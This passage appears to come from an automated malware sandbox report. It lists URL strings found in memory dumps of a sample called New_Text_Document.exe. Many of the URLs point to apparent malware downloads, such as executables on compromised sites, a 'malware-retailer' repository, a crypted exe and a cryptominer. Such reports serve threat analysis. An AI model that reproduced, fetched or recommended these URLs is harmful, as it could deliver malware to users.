                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/15c63318bd5a529e599
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/1e3d458e7ef86606925
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/26a53caa59be5c918cf
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/3b9da1066d77143b24e
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/59162d6533d5d56ceed
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/5fe74ecfd6a9eeef45b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/659474921cf6a442364
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/75d8077636ee1ec7b44
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/83f32a3d2dc9e3d9903
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/865b3db67f0565e0b41
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/891b6cff6879ab69ae1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/901d3bacbe82db5382c
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/a0538252234edd82661
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/a5d66a7d45ad000c992
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/b5ed26bd6f40eda4ff9
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/c42b27e42760a1e1812
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/c4fc1686ecf325a5432
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/cb0e88abe7aee128ff8
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/d5335cb7e978f712440
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/e756885f12abdf5cc84
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/siqlab/malware-retailer/raw/main/malwares-unzipped/2023-01-03/f4438ed05971a15d70c
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/software-AlEx/soft/archive/refs/heads/main.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/spaten228/terpilla/raw/main/Ghost_VPN_Free_setup.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/tedburke/CommandCam/archive/refs/heads/master.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/thelaimpluss/tlp-pc/raw/main/minuscrypt_crypted.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/xmrig/xmrig/releases/download/v6.10.0/xmrig-6.10.0-linux-static-x64.tar.gz
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gloombotmedia.com/dicm/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmhealthcare.dothome.co.kr/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmhealthcare.dothome.co.kr/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gmhealthcare.dothome.co.kr/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gonow.cl/or/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gorgeouswithtrend.com/reld/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://grandkadrihotel.com/pt/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://growrock.co.za/wp-content/niceeyestrain.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gsslofxh.page.link/1YAkmUPHC6gkPQM19
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gtn.cl/.END.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gumetale.github.io/l8hw/tcnjr.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://happybirthdaysmeme.com/mu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://harsiddhindustries.com/smal/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://haventowel.com/omti/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://heightfreight.com/aab/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hemseducation.com/tssm/
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hkkkk3eedffgggdkkk3333fff.hawklogger.repl.co/vbc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hostigram.xyz/?tkn=IhugknASxeGEXmQEZxB2rjMlLugaC6tTRAFBjrPDpXLPU&dl=1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://houssagynecologue.com/assets/js/sqlcmd.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hyper-soft.pro/hypersoft.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iarista.com/rpr/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ideamos.com.mx/iqtu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imageupload.io/ib/63jq5ylJrw9KxLq_1696608110.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                    Source: explorer.exe, 0000000C.00000002.2502572191.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.proxies.world/u/ImxyQs.exe
                    Source: raserver.exe, 00000014.00000002.2492996611.0000000005CDE000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000014.00000002.2504473111.0000000007870000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://img.softmedal.com/uploads/2023-05-16/474092336161.jpg
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://initiative-td.org/eert/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://intellectproactive.com/dist/out/mn.php
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://intl-investcapital.com/teet/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iosappslot.xyz/iesq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iosappslot.xyz/iesq/?62185141
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iqsoftdevcom.com/em/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ironreward.com/eq/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://iscl.co.in/npeo/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ishahcouture.com/wp-content/uploads/2020/03/ActiveGlucol.zip
